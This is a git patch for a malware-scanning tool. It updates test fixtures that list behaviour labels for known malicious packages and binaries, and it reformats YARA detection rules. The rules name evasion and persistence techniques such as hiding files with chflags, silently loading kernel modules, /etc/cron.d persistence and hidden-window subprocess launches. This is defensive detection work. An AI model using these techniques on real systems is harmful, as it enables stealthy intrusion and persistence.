-discover/system/hardware_info: low -discover/system/hostname_get: low +discover/network/interface: low +discover/system/cpu: medium +discover/system/hardware: low +discover/system/hostname: low discover/user/USER: low +evasion/file/attr/chflags: high exec/dylib/symbol_address: medium exec/program: medium exec/program/background: low -exec/program/hidden: low +exec/program/hidden: medium exec/script/osa: medium exec/shell/exec: medium exfil/stealer/notes: critical diff --git a/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple b/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple index dafd23ce8..685d7b1d2 100644 --- a/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple +++ b/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple @@ -12,7 +12,7 @@ data/hash/blake2b: low data/hash/sha1: low data/random/insecure: low discover/network/interface_list: medium -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low exec/cmd/pipe: medium exec/dylib/address_check: low diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff index 939d68075..523345be4 100644 --- a/tests/macOS/clean/ls.mdiff +++ b/tests/macOS/clean/ls.mdiff @@ -1,13 +1,13 @@ ## Deleted: ls.x86_64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|---------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | -| -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | -| -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | -| -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|---------|------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | +| -LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | +| -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | ## Added: ls [🔵 LOW] diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2 index 9e0e93a9c..902593b69 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_2 +++ b/tests/macOS/clean/ls.sdiff.trigger_2 @@ -1,6 +1,6 @@ --- missing: ls.x86_64 -data/compression/lzma --discover/system/hostname_get +-discover/system/hostname -exec/shell/TERM -fs/link_read -net/url/embedded diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3 index 9e0e93a9c..902593b69 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_3 +++ b/tests/macOS/clean/ls.sdiff.trigger_3 @@ -1,6 +1,6 @@ --- missing: ls.x86_64 -data/compression/lzma --discover/system/hostname_get +-discover/system/hostname -exec/shell/TERM -fs/link_read -net/url/embedded diff --git a/tests/npm/2024.harthat/deference.js.simple b/tests/npm/2024.harthat/deference.js.simple index 96d9cf0f3..9c67ea4d0 100644 --- a/tests/npm/2024.harthat/deference.js.simple +++ b/tests/npm/2024.harthat/deference.js.simple @@ -1,6 +1,6 @@ # npm/2024.harthat/deference.js: critical c2/addr/ip: high -c2/addr/url: medium +c2/addr/url: high discover/system/platform: medium evasion/indicator_blocking/echo_off: high fs/file/delete: medium diff --git a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple index 20bc9d6e8..5fff8faa7 100644 --- a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple +++ b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple @@ -1,7 +1,7 @@ # npm/2024.legacyreact-aws-s3-typescript/package.json: critical c2/tool_transfer/npm: critical c2/tool_transfer/shell: high -exec/program/hidden: low +exec/program/hidden: medium exec/shell/background_launcher: high exfil/npm: high fs/file/make_executable: medium diff --git a/tests/npm/2024.next-react-notify/tocall.js.simple b/tests/npm/2024.next-react-notify/tocall.js.simple index 60a0942ec..094947a69 100644 --- a/tests/npm/2024.next-react-notify/tocall.js.simple +++ b/tests/npm/2024.next-react-notify/tocall.js.simple @@ -1,7 +1,7 @@ # npm/2024.next-react-notify/tocall.js: critical anti-static/obfuscation/powershell: critical c2/addr/ip: high -c2/addr/url: medium +c2/addr/url: high discover/system/platform: medium evasion/bypass_security/executionpolicy_bypass: high evasion/indicator_blocking/echo_off: high diff --git a/tests/npm/2024.persona-tool/preinstall.js.simple b/tests/npm/2024.persona-tool/preinstall.js.simple index b01cbfb82..6f3ca3470 100644 --- a/tests/npm/2024.persona-tool/preinstall.js.simple +++ b/tests/npm/2024.persona-tool/preinstall.js.simple @@ -3,7 +3,7 @@ anti-static/obfuscation/hex: medium c2/addr/ip: medium c2/discovery/ip_dns_resolver: medium data/encoding/json_encode: low -discover/system/hostname_get: low +discover/system/hostname: low exfil/nodejs: critical exfil/oob: critical net/dns: low diff --git a/tests/php/clean/composer-2.7.7.simple b/tests/php/clean/composer-2.7.7.simple index 3732878d1..6f3daa588 100644 --- a/tests/php/clean/composer-2.7.7.simple +++ b/tests/php/clean/composer-2.7.7.simple @@ -18,7 +18,7 @@ data/embedded/base64_url: medium data/embedded/pem_certificate: low data/encoding/base64: low data/encoding/reverse: low -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple index 110a2dbd1..c7d13b7c0 100644 --- a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple +++ b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple @@ -1,8 +1,8 @@ # python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py: critical c2/tool_transfer/python: critical discover/ip/public: high +discover/multiple: medium discover/network/interface_list: medium -discover/system/network: medium discover/system/platform: medium discover/user/name_get: high evasion/file/prefix: medium diff --git a/tests/python/2023.JokerSpy/shared.dat.simple b/tests/python/2023.JokerSpy/shared.dat.simple index 4717f624a..a9253ba93 100644 --- a/tests/python/2023.JokerSpy/shared.dat.simple +++ b/tests/python/2023.JokerSpy/shared.dat.simple @@ -5,8 +5,8 @@ anti-static/obfuscation/python: high c2/tool_transfer/python: high data/base64/decode: medium data/encoding/base64: low +discover/multiple: high discover/network/interface_list: medium -discover/system/network: high discover/system/platform: medium discover/user/name_get: low evasion/file/prefix: medium diff --git a/tests/python/2024.Custom.RAT/output.py.simple b/tests/python/2024.Custom.RAT/output.py.simple index 5ddebac73..da913dc29 100644 --- a/tests/python/2024.Custom.RAT/output.py.simple +++ b/tests/python/2024.Custom.RAT/output.py.simple @@ -14,9 +14,9 @@ data/encoding/base64: low data/encoding/json_decode: low discover/ip/geo: high discover/ip/public: high +discover/multiple: high discover/network/interface_list: medium discover/process/name: medium -discover/system/network: high discover/system/platform: medium discover/system/sysinfo: medium discover/user/USER: low diff --git a/tests/windows/2024.GitHub.Clipper/main.exe.simple b/tests/windows/2024.GitHub.Clipper/main.exe.simple index d45d4ba9a..6c960140c 100644 --- a/tests/windows/2024.GitHub.Clipper/main.exe.simple +++ b/tests/windows/2024.GitHub.Clipper/main.exe.simple @@ -35,7 +35,7 @@ discover/ip/geo: high discover/ip/public: high discover/network/mac_address: medium discover/processes/list: medium -discover/system/cpu_info: low +discover/system/cpu: low exec/conditional/is_admin: medium exec/plugin: low exec/program: medium diff --git a/tests/windows/2024.GitHub.Clipper/raw.py.simple b/tests/windows/2024.GitHub.Clipper/raw.py.simple index 821ae34d9..340a54e9d 100644 --- a/tests/windows/2024.GitHub.Clipper/raw.py.simple +++ b/tests/windows/2024.GitHub.Clipper/raw.py.simple @@ -1,8 +1,9 @@ # windows/2024.GitHub.Clipper/raw.py: critical -c2/addr/url: medium +c2/addr/url: high c2/tool_transfer/download: high c2/tool_transfer/exe_url: high c2/tool_transfer/python: high +evasion/indicator_blocking/hidden_window: high exec/program: medium fs/file/open: low fs/tempdir: low diff --git a/tests/windows/2024.aspdasdksa2/creal.pyc.simple b/tests/windows/2024.aspdasdksa2/creal.pyc.simple index 35c4226f7..8e1ee6ea1 100644 --- a/tests/windows/2024.aspdasdksa2/creal.pyc.simple +++ b/tests/windows/2024.aspdasdksa2/creal.pyc.simple @@ -16,7 +16,7 @@ data/base64/decode: medium data/encoding/base64: low discover/ip/geo: high discover/ip/public: high -discover/system/hostname_get: low +discover/system/hostname: low exec/install_additional/pip_install: high exec/program: medium exec/tty/getpass: low diff --git a/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple b/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple index d7c191594..878585519 100644 --- a/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple +++ b/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple @@ -10,6 +10,7 @@ data/encoding/json_decode: low data/encoding/json_encode: low discover/network/interface_list: medium discover/network/netstat: medium +discover/system/dmesg: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low From 7cf4f84dc469bdd934aefd5b3fea3d844e9e7e83 Mon Sep 17 00:00:00 2001 From: Thomas Stromberg Date: Sun, 10 Nov 2024 11:49:58 -0500 Subject: [PATCH 7/7] run yr fmt --- rules/data/embedded/embedded-base64-elf.yara | 4 ++-- rules/discover/network/connectivity.yara | 3 +-- rules/discover/system/dmesg.yara | 4 ++-- rules/evasion/file/attr/chflags.yara | 4 ++-- rules/evasion/file/location/multiple.yara | 2 +- rules/evasion/indicator_blocking/hidden_window.yara | 12 ++++++------ rules/exec/program/hidden.yara | 2 +- rules/impact/remote_access/botnet.yara | 3 +-- rules/net/dns/dns-over-https.yara | 2 +- rules/net/ip/spoof.yara | 5 +++-- rules/persist/cron/etc_cron_d.yara | 6 +++--- rules/persist/kernel_module/insert.yara | 4 ++-- rules/persist/kernel_module/module.yara | 2 +- rules/sus/geopolitics.yara | 5 +++-- rules/sus/malicious.yara | 3 ++- 15 files changed, 31 insertions(+), 30 deletions(-) diff --git a/rules/data/embedded/embedded-base64-elf.yara b/rules/data/embedded/embedded-base64-elf.yara index 350411a80..3c2418ec7 100644 --- a/rules/data/embedded/embedded-base64-elf.yara +++ b/rules/data/embedded/embedded-base64-elf.yara @@ -1,7 +1,7 @@ rule base64_elf: high { meta: - description = "Contains base64 encoded ELF binary" - + description = "Contains base64 encoded ELF binary" + strings: $header = "f0VMRgEBAQ" diff --git a/rules/discover/network/connectivity.yara b/rules/discover/network/connectivity.yara index 02e2f5114..5a4feaef5 100644 --- a/rules/discover/network/connectivity.yara +++ b/rules/discover/network/connectivity.yara @@ -1,5 +1,4 @@ - -rule network_connectivity : low { +rule network_connectivity: low { meta: description = "checks Internet connectivity" diff --git a/rules/discover/system/dmesg.yara b/rules/discover/system/dmesg.yara index d702f0060..50f9f9057 100644 --- a/rules/discover/system/dmesg.yara +++ b/rules/discover/system/dmesg.yara @@ -3,8 +3,8 @@ rule dmesg { description = "accesses the kernel log ring buffer" strings: - $dmesg = "dmesg" fullword + $dmesg = "dmesg" fullword condition: any of them -} \ No newline at end of file +} diff --git a/rules/evasion/file/attr/chflags.yara b/rules/evasion/file/attr/chflags.yara index a562cbdd7..41fcea50d 100644 --- a/rules/evasion/file/attr/chflags.yara +++ b/rules/evasion/file/attr/chflags.yara @@ -1,11 +1,11 @@ -rule chflags_hidden : high { +rule chflags_hidden: high { meta: description = "hides files using chflags" ref = "https://man.freebsd.org/cgi/man.cgi?chflags(1)" strings: $chflags = /chflags.{0,3} hidden [\w\.\/]{0,24}/ - + condition: any of them } diff --git a/rules/evasion/file/location/multiple.yara b/rules/evasion/file/location/multiple.yara index ee1f07fb2..7039993b6 100644 --- a/rules/evasion/file/location/multiple.yara +++ b/rules/evasion/file/location/multiple.yara @@ -15,5 +15,5 @@ rule multiple_elf: high linux { $ = /\/var\/spool\/[\%\w\-\/\.]{0,64}/ condition: - filesize < 1MB and uint32(0) == 1179403647 and 80% of them + filesize < 1MB and uint32(0) == 1179403647 and 80 % of them } diff --git a/rules/evasion/indicator_blocking/hidden_window.yara b/rules/evasion/indicator_blocking/hidden_window.yara index e17c82436..35d40bb12 100644 --- a/rules/evasion/indicator_blocking/hidden_window.yara +++ b/rules/evasion/indicator_blocking/hidden_window.yara @@ -1,10 +1,9 @@ - rule subprocess_CREATE_NO_WINDOW: medium { meta: description = "runs commands, hides windows" strings: - $sub = "subprocess" + $sub = "subprocess" $no_window = "CREATE_NO_WINDOW" condition: @@ -33,7 +32,7 @@ rule subprocess_CREATE_NO_WINDOW_setuptools: high { description = "runs commands, hides windows" strings: - $sub = "subprocess" + $sub = "subprocess" $no_window = "CREATE_NO_WINDOW" condition: @@ -45,10 +44,11 @@ rule subprocess_CREATE_NO_WINDOW_high: high { description = "runs commands, hides windows" strings: - $s_sub = "subprocess" + $s_sub = "subprocess" $s_no_window = "CREATE_NO_WINDOW" - $o_discord = "discordapp.com" + $o_discord = "discordapp.com" + condition: filesize < 32KB and all of ($s*) and any of ($o*) -} \ No newline at end of file +} diff --git a/rules/exec/program/hidden.yara b/rules/exec/program/hidden.yara index be6cc6a9e..6c76d9529 100644 --- a/rules/exec/program/hidden.yara +++ b/rules/exec/program/hidden.yara @@ -1,4 +1,4 @@ -rule relative_hidden_launcher : medium { +rule relative_hidden_launcher: medium { strings: $relative_hidden = /\.\/\.[\w][\w\/\.\_\-]{3,16}/ fullword $x_exec = "exec" diff --git a/rules/impact/remote_access/botnet.yara b/rules/impact/remote_access/botnet.yara index 82f1ab9e2..898e16df1 100644 --- a/rules/impact/remote_access/botnet.yara +++ b/rules/impact/remote_access/botnet.yara @@ -4,13 +4,12 @@ rule bot: medium { strings: $BOTDIR = "BOTDIR" - $botdir = "botdir" + $botdir = "botdir" condition: filesize < 1MB and any of them } - rule botnet_high: high { meta: description = "References a 'botnet'" diff --git a/rules/net/dns/dns-over-https.yara b/rules/net/dns/dns-over-https.yara index b4eb8aada..55ad3f1cf 100644 --- a/rules/net/dns/dns-over-https.yara +++ b/rules/net/dns/dns-over-https.yara @@ -11,7 +11,7 @@ rule doh_refs: medium { $contentType = "application/dns-message" $dnspod = "dnspod" $doh_url = "doh-url" fullword - $cloudflare = "https://9.9.9.9/dns-query" + $cloudflare = "https://9.9.9.9/dns-query" condition: any of them diff --git a/rules/net/ip/spoof.yara b/rules/net/ip/spoof.yara index 4183e229a..9b37a7ac3 100644 --- a/rules/net/ip/spoof.yara +++ b/rules/net/ip/spoof.yara @@ -6,10 +6,11 @@ rule spoof: medium { hash_2022_devicespoofer_2_2_setup = "195d69dc251a045b01fdd6854327c545283b36ebae7c54e06599b14b50ec39e6" strings: - $spoof = /[a-zA-Z\-_ ]{0,16}spoof[a-zA-Z\-_ ]{0,16}/ fullword + $spoof = /[a-zA-Z\-_ ]{0,16}spoof[a-zA-Z\-_ ]{0,16}/ fullword $spoof2 = /[a-zA-Z\-_ ]{0,16}Spoof[a-zA-Z\-_ ]{0,16}/ fullword - $not_chk = "Spoofchk" + $not_chk = "Spoofchk" + condition: any of ($s*) and none of ($not*) } diff --git a/rules/persist/cron/etc_cron_d.yara b/rules/persist/cron/etc_cron_d.yara index 00c7cfdb5..9f7721074 100644 --- a/rules/persist/cron/etc_cron_d.yara +++ b/rules/persist/cron/etc_cron_d.yara @@ -1,11 +1,11 @@ rule cron_d_user: high { meta: - description = "Uses /etc/cron.d to persist" + description = "Uses /etc/cron.d to persist" strings: - $c_etc_crontab = /\/etc\/cron\.d\/[\w\.\-\%\/]{1,16}/ + $c_etc_crontab = /\/etc\/cron\.d\/[\w\.\-\%\/]{1,16}/ - $not_usage = "usage: cron" + $not_usage = "usage: cron" condition: filesize < 52428800 and any of ($c*) and none of ($not*) diff --git a/rules/persist/kernel_module/insert.yara b/rules/persist/kernel_module/insert.yara index 8efd49b77..05254583e 100644 --- a/rules/persist/kernel_module/insert.yara +++ b/rules/persist/kernel_module/insert.yara @@ -14,11 +14,11 @@ rule kernel_module_loader: high linux { rule kernel_module_loader_sus: high linux { meta: - description = "suspiciously loads Linux kernel module via insload" + description = "suspiciously loads Linux kernel module via insload" strings: $insmod = /insmod [ \$\%\w\.\/_-]{1,32} .{0,16}\/dev\/null 2\>\&1/ - + condition: filesize < 10MB and all of them } diff --git a/rules/persist/kernel_module/module.yara b/rules/persist/kernel_module/module.yara index ab71b2f1f..028c50111 100644 --- a/rules/persist/kernel_module/module.yara +++ b/rules/persist/kernel_module/module.yara @@ -29,7 +29,7 @@ rule lkm_embedded_in_elf: high { $srcversion = "srcversion=" condition: - elf.type == elf.ET_EXEC and all of them + elf.type == elf.ET_EXEC and all of them } rule delete_module: medium { diff --git a/rules/sus/geopolitics.yara b/rules/sus/geopolitics.yara index 9c40cb51f..21f2a354d 100644 --- a/rules/sus/geopolitics.yara +++ b/rules/sus/geopolitics.yara @@ -1,9 +1,10 @@ rule ukraine: medium { meta: - description = "Glory to Ukraine!" + description = "Glory to Ukraine!" + strings: $ref = "слава Украине!" - + condition: any of them } diff --git a/rules/sus/malicious.yara b/rules/sus/malicious.yara index ff9913619..080e8333b 100644 --- a/rules/sus/malicious.yara +++ b/rules/sus/malicious.yara @@ -5,7 +5,8 @@ rule malicious: medium { strings: $ref = /[a-zA-Z\-_ ]{0,16}malicious[a-zA-Z\-_ ]{0,16}/ fullword - $not_sshd = "attempt by a malicious server" + $not_sshd = "attempt by a malicious server" + condition: $ref and none of ($not*) }